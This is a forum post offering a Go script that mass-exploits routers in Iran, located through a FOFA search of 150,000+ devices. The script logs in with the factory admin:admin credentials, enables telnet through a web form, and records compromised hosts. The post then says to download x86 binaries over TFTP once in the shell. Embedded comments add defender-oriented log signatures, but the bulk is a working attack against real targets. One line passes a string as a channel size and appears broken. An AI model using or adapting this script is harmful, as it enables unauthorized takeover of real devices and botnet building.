Exploit x86-based router from Iran


Exploit x86-based router from Iran

Postby ltx_Lazzarus » Sun May 05, 2024 7:04 am

Just using some fair dinkum techniques to open up that telnet shell on the devices

150k+ Iranian Router Devices: https://en.fofa.info/result?qbase64=InJ ... lSIg%3D%3D

Ports: 443 and 80 - that's where the action's at! We'll be slingin' all those hits straight into the file, with the ol' IP: 23 and admin:admin combo.

Time to get the TFTP goin' and download those bins, mate. The arch is good ol' x86.

When you're in the telnet shell, just give it a "shell" and you're in business. Grab that 1.1.1.1 file with the TFTP get.


package main

import (
    "bufio"
    "fmt"
    "io/ioutil"
    "net/http"
    "os"
    "sync"
)

// Request templates and markers used by the script.
//
// Defender notes: the two endpoints below, requested in sequence from the
// same client, are the web-log signature of this tool: a POST to /login.cgi
// carrying usernameEncrypt/passwordEncrypt, followed by a POST to
// /form2Telnet.cgi carrying telnet=1. The 32-hex-digit value submitted for
// both fields is the MD5 digest of the string "admin", i.e. the factory
// default account named in the post. Changing the default credentials,
// keeping the web management interface off the WAN side, and leaving telnet
// disabled remove the exposure this script depends on.
const (
    // loginURL and telnetURL are fmt templates; %s is replaced with a line
    // read from the input list.
    loginURL      = "http://%s/login.cgi"
    telnetURL     = "http://%s/form2Telnet.cgi"
    // loginPayload and telnetPayload are declared but not referenced by the
    // code visible in this listing; enableTelnet builds the same fields as
    // form maps instead.
    loginPayload  = "usernameEncrypt=21232f297a57a5a743894a0e4a801fc3&passwordEncrypt=21232f297a57a5a743894a0e4a801fc3&submit.htm%%3Flogin.htm=Send"
    telnetPayload = "telnet=1&submit.htm%%3Ftelnet_onoff.htm=Send"
    // outputFile is the result file written into the working directory.
    outputFile    = "successful_hits.txt"
    // failedContent is the exact response body that enableTelnet treats as a
    // rejection: an HTML stub whose script sends the browser back to
    // /login.htm.
    failedContent = "<html><head><meta HTTP-EQUIV=\"Pragma\" CONTENT=\"no-cache\"><script language='javascript'>parent.location=\"/login.htm\"</script></head><body></body></html>"
)

// Package-level tallies shared by all goroutines. mu guards both counters
// and, in enableTelnet, also serializes writes to the shared output file.
var (
    successful int
    failed     int
    mu         sync.Mutex
)

// enableTelnet sends two form POSTs to the host named by ip and records the
// outcome: first to the login endpoint with the default-credential digest,
// then to the telnet on/off form with telnet=1. A transport error on either
// request increments failed and returns. Otherwise the second response is
// classified: HTTP 200 with a body equal to failedContent counts as failed;
// every other response counts as successful and appends "<ip>:23 admin:admin"
// to file.
//
// Defender notes: the requests use Go's default HTTP client, so unless an
// intermediary rewrites it they arrive with the stock Go User-Agent. The
// form field names used here ("usernameEncrypt", "passwordEncrypt",
// "submit.htm?login.htm", "submit.htm?telnet_onoff.htm") are usable as
// match strings in web-server or IDS rules. On a device that has been
// touched, the visible effect is the telnet service setting being switched
// on; auditing that setting and TCP/23 reachability is the corresponding
// check.
func enableTelnet(ip string, file *os.File) {
    // Step 1: submit the login form. The response body and status are not
    // inspected; only a transport-level error is treated as failure.
    resp, err := http.PostForm(fmt.Sprintf(loginURL, ip), map[string][]string{
        "usernameEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
        "passwordEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
        "submit.htm?login.htm": {"Send"},
    })
    if err != nil {
        mu.Lock()
        failed++
        mu.Unlock()
        return
    }
    defer resp.Body.Close()

    // Step 2: submit the telnet on/off form with telnet=1.
    resp, err = http.PostForm(fmt.Sprintf(telnetURL, ip), map[string][]string{
        "telnet":              {"1"},
        "submit.htm?telnet_onoff.htm": {"Send"},
    })
    if err != nil {
        mu.Lock()
        failed++
        mu.Unlock()
        return
    }
    defer resp.Body.Close()

    // The read error is discarded; a truncated body is compared as-is.
    bodyBytes, _ := ioutil.ReadAll(resp.Body)
    bodyString := string(bodyBytes)

    // Only the exact redirect-to-login page on a 200 is treated as a
    // rejection; any other status or body falls into the else branch.
    if resp.StatusCode == http.StatusOK && bodyString == failedContent {
        mu.Lock()
        failed++
        mu.Unlock()
    } else {
        mu.Lock()
        successful++
        // The file write happens under mu so lines from concurrent
        // goroutines are not interleaved.
        fmt.Fprintf(file, "%s:23 admin:admin\n", ip)
        mu.Unlock()
    }
}

// main reads a list of hosts (one per line) from the file named by the first
// argument, runs enableTelnet on each line in its own goroutine, and prints
// the success/failure tallies once all goroutines have finished. Results are
// written to outputFile, which is created (truncating any existing file) in
// the current directory.
func main() {
    // Two positional arguments are required: the host list and a
    // concurrency value.
    if len(os.Args) < 3 {
        fmt.Println("Made by Vars_Secc, Usage: ./golangscript ips.txt threads")
        return
    }

    filePath := os.Args[1]
    threads := os.Args[2]

    ipFile, err := os.Open(filePath)
    if err != nil {
        fmt.Println("Error opening IP file:", err)
        return
    }
    defer ipFile.Close()

    outFile, err := os.Create(outputFile)
    if err != nil {
        fmt.Println("Error creating output file:", err)
        return
    }
    defer outFile.Close()

    // wg tracks outstanding goroutines; sem is intended as a counting
    // semaphore sized from the second argument.
    var wg sync.WaitGroup
    sem := make(chan bool, threads)

    scanner := bufio.NewScanner(ipFile)
    for scanner.Scan() {
        wg.Add(1)
        // Acquire a slot before starting the goroutine; the slot is released
        // at the end of the goroutine body.
        sem <- true
        go func(ip string) {
            defer wg.Done()
            enableTelnet(ip, outFile)
            <-sem
        }(scanner.Text())
    }

    // Wait for every per-host goroutine before reading the shared counters.
    wg.Wait()

    fmt.Printf("Made by Vars_Secc, Successful: %d\n", successful)
    fmt.Printf("Made by Vars_Secc, Failed: %d\n", failed)
}
stopthe4ttack.box
